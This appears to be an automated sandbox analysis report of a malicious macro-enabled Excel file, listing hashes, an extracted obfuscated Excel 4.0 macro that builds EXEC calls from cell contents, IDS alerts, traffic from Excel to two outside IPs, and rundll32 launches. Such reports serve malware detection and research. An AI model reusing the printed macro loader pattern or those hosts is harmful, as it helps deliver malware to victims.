Category: | dropped |
Size (bytes): | 330 |
Entropy (8bit): | 1.6081032063576088 |
Encrypted: | false |
SSDEEP: | 3:RFXI6dtBhFXI6dtt:RJZhJ1 |
MD5: | 836727206447D2C6B98C973E058460C9 |
SHA1: | D83351CF6DE78FEDE0142DE5434F9217C4F285D2 |
SHA-256: | D9BECB14EECC877F0FA39B6B6F856365CADF730B64E7FA2163965D181CC5EB41 |
SHA-512: | 7F843EDD7DC6230BF0E05BF988D25AE6188F8B22808F2C990A1E8039C0CECC25D1D101E0FDD952722FEAD538F7C7C14EEF9FD7F4B31036C3E7F79DE570CD0607 |
Malicious: | true |
Preview: |
|
Static File Info |
---|
General | |
---|---|
File type: | |
Entropy (8bit): | 7.660562640081434 |
TrID: |
|
File name: | Comission_1980420924_03172021.xlsm |
File size: | 189036 |
MD5: | 7c87c28b3c650992cca31f7728aa2cfd |
SHA1: | e278ae31532f3f65297d8c97d21080321cd79e9f |
SHA256: | c794d4aa56fd9e070e2a7ef2b18c08016da687eddb100350216cada8110074d9 |
SHA512: | 4844ddff58adea9aeaed98893af851f849e9318c06cf440a0651b043ecfa00499dc3e08812efcf5fad955206d12f0f4e57ad953ecad728fbe0cf57bb1b4d88d7 |
SSDEEP: | 3072:kXFYiB3kNT+2Jozo1UW8gOvlAsku0Gy3ZsY0OPlaK/LBt:kXFYiB3kNBozoR8gOvljFy3ZIOXr |
File Content Preview: | PK..........!..#|.....X.......[Content_Types].xml ...(......................................................................................................................................................................................................... |
File Icon |
---|
Icon Hash: | 74ecd0e2f696908c |
Static OLE Info |
---|
General | ||
---|---|---|
Document Type: | OpenXML | |
Number of OLE Files: | 1 |
OLE File "Comission_1980420924_03172021.xlsm" |
---|
Indicators | |
---|---|
Has Summary Info: | |
Application Name: | |
Encrypted Document: | |
Contains Word Document Stream: | |
Contains Workbook/Book Stream: | |
Contains PowerPoint Document Stream: | |
Contains Visio Document Stream: | |
Contains ObjectPool Stream: | |
Flash Objects Count: | |
Contains VBA Macros: |
Macro 4.0 Code |
---|
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,http://,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
=COUNTBLANK(V201:V224)=COUNTBLANK(V201:V224)=EXEC(sheet1!AP264&sheet1!AP263&sheet1!AP265)=COUNTBLANK(V201:V224)=COUNTBLANK(V201:V224)"=COUNTBLANK(V201:V224)=COUNTBLANK(V201:V224)=EXEC(sheet1!AP264&sheet1!AP263&""1""&sheet1!AP265)=COUNTBLANK(V201:V224)=COUNTBLANK(V201:V224)""=COUNTBLANK(V201:V224)=COUNTBLANK(V201:V224)=EXEC(sheet1!AP264&sheet1!AP263&""2""&sheet1!AP265)=COUNTBLANK(V201:V224)=COUNTBLANK(V201:V224)"=GOTO(sheet1!AU279)
Network Behavior |
---|
Snort IDS Alerts |
---|
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|---|---|---|
04/07/21-17:28:31.289345 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49169 | 188.119.112.114 | 192.168.2.22 |
04/07/21-17:28:31.544942 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49170 | 185.82.219.75 | 192.168.2.22 |
Network Port Distribution |
---|
TCP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Apr 7, 2021 17:35:15.592169046 CEST | 49705 | 80 | 192.168.2.5 | 188.127.230.104 |
Apr 7, 2021 17:35:18.648963928 CEST | 49705 | 80 | 192.168.2.5 | 188.127.230.104 |
Apr 7, 2021 17:35:24.649446964 CEST | 49705 | 80 | 192.168.2.5 | 188.127.230.104 |
Apr 7, 2021 17:35:36.674173117 CEST | 49718 | 80 | 192.168.2.5 | 188.119.112.114 |
Apr 7, 2021 17:35:36.702965021 CEST | 80 | 49718 | 188.119.112.114 | 192.168.2.5 |
Apr 7, 2021 17:35:36.703063011 CEST | 49718 | 80 | 192.168.2.5 | 188.119.112.114 |
Apr 7, 2021 17:35:36.704644918 CEST | 49718 | 80 | 192.168.2.5 | 188.119.112.114 |
Apr 7, 2021 17:35:36.731509924 CEST | 80 | 49718 | 188.119.112.114 | 192.168.2.5 |
Apr 7, 2021 17:35:36.932835102 CEST | 80 | 49718 | 188.119.112.114 | 192.168.2.5 |
Apr 7, 2021 17:35:36.932996035 CEST | 49718 | 80 | 192.168.2.5 | 188.119.112.114 |
Apr 7, 2021 17:35:36.940798044 CEST | 49719 | 80 | 192.168.2.5 | 185.82.219.75 |
Apr 7, 2021 17:35:36.985958099 CEST | 80 | 49719 | 185.82.219.75 | 192.168.2.5 |
Apr 7, 2021 17:35:36.986102104 CEST | 49719 | 80 | 192.168.2.5 | 185.82.219.75 |
Apr 7, 2021 17:35:36.986771107 CEST | 49719 | 80 | 192.168.2.5 | 185.82.219.75 |
Apr 7, 2021 17:35:37.030154943 CEST | 80 | 49719 | 185.82.219.75 | 192.168.2.5 |
Apr 7, 2021 17:35:37.204653025 CEST | 80 | 49719 | 185.82.219.75 | 192.168.2.5 |
Apr 7, 2021 17:35:37.204737902 CEST | 49719 | 80 | 192.168.2.5 | 185.82.219.75 |
Apr 7, 2021 17:36:41.937640905 CEST | 80 | 49718 | 188.119.112.114 | 192.168.2.5 |
Apr 7, 2021 17:36:41.937735081 CEST | 49718 | 80 | 192.168.2.5 | 188.119.112.114 |
Apr 7, 2021 17:36:42.209404945 CEST | 80 | 49719 | 185.82.219.75 | 192.168.2.5 |
Apr 7, 2021 17:36:42.209533930 CEST | 49719 | 80 | 192.168.2.5 | 185.82.219.75 |
Apr 7, 2021 17:37:01.482237101 CEST | 49719 | 80 | 192.168.2.5 | 185.82.219.75 |
Apr 7, 2021 17:37:01.482916117 CEST | 49718 | 80 | 192.168.2.5 | 188.119.112.114 |
Apr 7, 2021 17:37:01.511718988 CEST | 80 | 49718 | 188.119.112.114 | 192.168.2.5 |
Apr 7, 2021 17:37:01.528115034 CEST | 80 | 49719 | 185.82.219.75 | 192.168.2.5 |
UDP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Apr 7, 2021 17:34:58.351875067 CEST | 65307 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 7, 2021 17:34:58.364454985 CEST | 53 | 65307 | 8.8.8.8 | 192.168.2.5 |
Apr 7, 2021 17:34:58.870826006 CEST | 64344 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 7, 2021 17:34:58.884255886 CEST | 53 | 64344 | 8.8.8.8 | 192.168.2.5 |
Apr 7, 2021 17:34:59.193109989 CEST | 62060 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 7, 2021 17:34:59.205982924 CEST | 53 | 62060 | 8.8.8.8 | 192.168.2.5 |
Apr 7, 2021 17:34:59.796698093 CEST | 61805 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 7, 2021 17:34:59.810400009 CEST | 53 | 61805 | 8.8.8.8 | 192.168.2.5 |
Apr 7, 2021 17:35:01.967953920 CEST | 54795 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 7, 2021 17:35:01.982530117 CEST | 53 | 54795 | 8.8.8.8 | 192.168.2.5 |
Apr 7, 2021 17:35:02.995198011 CEST | 49557 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 7, 2021 17:35:03.008181095 CEST | 53 | 49557 | 8.8.8.8 | 192.168.2.5 |
Apr 7, 2021 17:35:05.887080908 CEST | 61733 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 7, 2021 17:35:05.907430887 CEST | 53 | 61733 | 8.8.8.8 | 192.168.2.5 |
Apr 7, 2021 17:35:11.519834042 CEST | 65447 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 7, 2021 17:35:11.577848911 CEST | 53 | 65447 | 8.8.8.8 | 192.168.2.5 |
Apr 7, 2021 17:35:11.996236086 CEST | 52441 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 7, 2021 17:35:12.017131090 CEST | 53 | 52441 | 8.8.8.8 | 192.168.2.5 |
Apr 7, 2021 17:35:12.998294115 CEST | 52441 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 7, 2021 17:35:13.011636019 CEST | 53 | 52441 | 8.8.8.8 | 192.168.2.5 |
Apr 7, 2021 17:35:14.058377028 CEST | 52441 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 7, 2021 17:35:14.078953028 CEST | 53 | 52441 | 8.8.8.8 | 192.168.2.5 |
Apr 7, 2021 17:35:16.070971012 CEST | 52441 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 7, 2021 17:35:16.084076881 CEST | 53 | 52441 | 8.8.8.8 | 192.168.2.5 |
Apr 7, 2021 17:35:20.086781979 CEST | 52441 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 7, 2021 17:35:20.097259998 CEST | 62176 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 7, 2021 17:35:20.100059032 CEST | 53 | 52441 | 8.8.8.8 | 192.168.2.5 |
Apr 7, 2021 17:35:20.109745979 CEST | 53 | 62176 | 8.8.8.8 | 192.168.2.5 |
Apr 7, 2021 17:35:21.324604988 CEST | 59596 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 7, 2021 17:35:21.338169098 CEST | 53 | 59596 | 8.8.8.8 | 192.168.2.5 |
Apr 7, 2021 17:35:23.861440897 CEST | 65296 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 7, 2021 17:35:23.874171019 CEST | 53 | 65296 | 8.8.8.8 | 192.168.2.5 |
Apr 7, 2021 17:35:25.492499113 CEST | 63183 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 7, 2021 17:35:25.505495071 CEST | 53 | 63183 | 8.8.8.8 | 192.168.2.5 |
Apr 7, 2021 17:35:27.621049881 CEST | 60151 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 7, 2021 17:35:27.641642094 CEST | 53 | 60151 | 8.8.8.8 | 192.168.2.5 |
Apr 7, 2021 17:35:31.248034000 CEST | 56969 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 7, 2021 17:35:31.262487888 CEST | 53 | 56969 | 8.8.8.8 | 192.168.2.5 |
Apr 7, 2021 17:35:33.420664072 CEST | 55161 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 7, 2021 17:35:33.434581041 CEST | 53 | 55161 | 8.8.8.8 | 192.168.2.5 |
Apr 7, 2021 17:35:34.953347921 CEST | 54757 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 7, 2021 17:35:34.966614962 CEST | 53 | 54757 | 8.8.8.8 | 192.168.2.5 |
Apr 7, 2021 17:35:41.939289093 CEST | 49992 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 7, 2021 17:35:41.953826904 CEST | 53 | 49992 | 8.8.8.8 | 192.168.2.5 |
Apr 7, 2021 17:35:44.977627993 CEST | 60075 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 7, 2021 17:35:44.997548103 CEST | 53 | 60075 | 8.8.8.8 | 192.168.2.5 |
Apr 7, 2021 17:35:54.416148901 CEST | 55016 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 7, 2021 17:35:54.443725109 CEST | 53 | 55016 | 8.8.8.8 | 192.168.2.5 |
Apr 7, 2021 17:35:57.611288071 CEST | 64345 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 7, 2021 17:35:57.623776913 CEST | 53 | 64345 | 8.8.8.8 | 192.168.2.5 |
Apr 7, 2021 17:36:00.173840046 CEST | 57128 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 7, 2021 17:36:00.187432051 CEST | 53 | 57128 | 8.8.8.8 | 192.168.2.5 |
Apr 7, 2021 17:36:19.070545912 CEST | 54791 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 7, 2021 17:36:19.097323895 CEST | 53 | 54791 | 8.8.8.8 | 192.168.2.5 |
Apr 7, 2021 17:36:39.680593014 CEST | 50463 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 7, 2021 17:36:39.696135044 CEST | 53 | 50463 | 8.8.8.8 | 192.168.2.5 |
Apr 7, 2021 17:36:42.336549997 CEST | 50394 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 7, 2021 17:36:42.364864111 CEST | 53 | 50394 | 8.8.8.8 | 192.168.2.5 |
Apr 7, 2021 17:37:40.883125067 CEST | 58530 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 7, 2021 17:37:40.946337938 CEST | 53 | 58530 | 8.8.8.8 | 192.168.2.5 |
Apr 7, 2021 17:37:41.412671089 CEST | 53813 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 7, 2021 17:37:41.487431049 CEST | 53 | 53813 | 8.8.8.8 | 192.168.2.5 |
Apr 7, 2021 17:37:41.748771906 CEST | 63732 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 7, 2021 17:37:41.870615005 CEST | 53 | 63732 | 8.8.8.8 | 192.168.2.5 |
Apr 7, 2021 17:37:42.142398119 CEST | 57344 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 7, 2021 17:37:42.224147081 CEST | 53 | 57344 | 8.8.8.8 | 192.168.2.5 |
Apr 7, 2021 17:37:42.595407009 CEST | 54450 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 7, 2021 17:37:42.608704090 CEST | 53 | 54450 | 8.8.8.8 | 192.168.2.5 |
Apr 7, 2021 17:37:42.965485096 CEST | 59261 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 7, 2021 17:37:42.978367090 CEST | 53 | 59261 | 8.8.8.8 | 192.168.2.5 |
Apr 7, 2021 17:37:43.287322044 CEST | 57151 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 7, 2021 17:37:43.300596952 CEST | 53 | 57151 | 8.8.8.8 | 192.168.2.5 |
Apr 7, 2021 17:37:43.696594954 CEST | 59413 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 7, 2021 17:37:43.710262060 CEST | 53 | 59413 | 8.8.8.8 | 192.168.2.5 |
Apr 7, 2021 17:37:44.463150024 CEST | 60516 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 7, 2021 17:37:44.476830959 CEST | 53 | 60516 | 8.8.8.8 | 192.168.2.5 |
Apr 7, 2021 17:37:44.744183064 CEST | 51649 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 7, 2021 17:37:44.757565022 CEST | 53 | 51649 | 8.8.8.8 | 192.168.2.5 |
HTTP Request Dependency Graph |
---|
|
HTTP Packets |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
0 | 192.168.2.5 | 49718 | 188.119.112.114 | 80 | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Apr 7, 2021 17:35:36.704644918 CEST | 1363 | OUT | |
Apr 7, 2021 17:35:36.932835102 CEST | 1363 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
1 | 192.168.2.5 | 49719 | 185.82.219.75 | 80 | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Apr 7, 2021 17:35:36.986771107 CEST | 1364 | OUT | |
Apr 7, 2021 17:35:37.204653025 CEST | 1365 | IN |
Code Manipulations |
---|
Statistics |
---|
CPU Usage |
---|
Click to jump to process
Memory Usage |
---|
Click to jump to process
High Level Behavior Distribution |
---|
back
Click to dive into process behavior distribution
Behavior |
---|
Click to jump to process
System Behavior |
---|
General |
---|
Start time: | 17:35:10 |
Start date: | 07/04/2021 |
Path: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0xa30000 |
File size: | 27110184 bytes |
MD5 hash: | 5D6638F2C8F8571C593999C58866007E |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 17:35:36 |
Start date: | 07/04/2021 |
Path: | C:\Windows\SysWOW64\rundll32.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x9a0000 |
File size: | 61952 bytes |
MD5 hash: | D7CA562B0DB4F4DD0F03A89A1FDAD63D |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 17:35:37 |
Start date: | 07/04/2021 |
Path: | C:\Windows\SysWOW64\rundll32.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x9a0000 |
File size: | 61952 bytes |
MD5 hash: | D7CA562B0DB4F4DD0F03A89A1FDAD63D |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 17:35:38 |
Start date: | 07/04/2021 |
Path: | C:\Windows\SysWOW64\rundll32.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x9a0000 |
File size: | 61952 bytes |
MD5 hash: | D7CA562B0DB4F4DD0F03A89A1FDAD63D |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Disassembly |
---|
Code Analysis |
---|